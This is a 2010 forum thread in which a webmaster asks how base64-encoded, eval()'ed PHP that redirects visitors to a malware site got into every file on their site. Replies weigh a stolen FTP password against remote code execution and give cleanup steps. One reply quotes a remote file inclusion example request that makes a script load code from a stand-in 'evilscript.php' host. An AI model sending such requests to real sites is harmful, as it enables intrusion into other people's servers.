Page 1 of 1
PHP code inserted in all files
Posted: Tue May 18, 2010 11:46 am
by broncha
Hi,
I noticed this when my site was automatically being redirected to a malware hosting site.My site was attacked and when I downloaded the files to check them,I found a block of PHP code inserted in each and every file.The code was a base64 encoded PHP code which was evel()'ed in the beginning of every file.
The code inserted a script tag with an external js file source which sets some cookies and redirects to another site.
Any idea how the attacker was actually able to insert the code physically in each and every file??
Please help.
Re: PHP code inserted in all files
Posted: Tue May 18, 2010 12:20 pm
by flying_circus
More than likely your ftp account was compromised. Change your passwords.
Re: PHP code inserted in all files
Posted: Fri Jul 30, 2010 4:26 pm
by Cr00zng
While the FTP account exploited could cause this, is there anytime when the PHP in itself could be the reason

?
Re: PHP code inserted in all files
Posted: Sat Jul 31, 2010 2:28 pm
by ColonelSandersLite
I don't see why not. If you could manage to execute php code of your specification (google remote code execution), php does have the capability to write data to files and it's not that hard to get a complete list of files from php either.
An example:
http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/
On many PHP installations, the include() and require() functions can include remote files. If the malicious user were to call your script like this:
script.php?page=
http://mysite.com/evilscript.php
That would pretty much let the attacker do whatever they wanted.
An intrusion via ftp is likely, however a web based attack cannot be ruled out without more information.
Re: PHP code inserted in all files
Posted: Sat Jul 31, 2010 5:01 pm
by superdezign
That seems possible if the remote script being called outputs PHP code, rather than just being a PHP file.
I, too, doubt that this is an issue of the FTP being compromised. You should beef up your code's security or pay one of those auditing companies to check our code for you.
Re: PHP code inserted in all files
Posted: Sun Aug 01, 2010 1:45 pm
by ColonelSandersLite
Just a thought:
Since you didn't mention at all:
A: what level of business the site is (could be anything from hobby to a moderate corporation)
B: whether or not this is a prepackaged php installation or custom code
If it's part of a prepackaged installation, I would suggest:
Make a complete backup of the corrupted files for further examination.
Run malware scans on any and all machines you use to administrate the site.
Change the passwords to access the webserver though your webhost if appropriate.
Change the ftp password.
Reinstall the software/restore from the most recent unaffected backup.
Report the problem in detail to the software's maker. Be sure to offer any available logs and a copy of the affected files.
Of course, if it's custom software written by you, be sure to check it over for security holes that might allow remote code execution especially.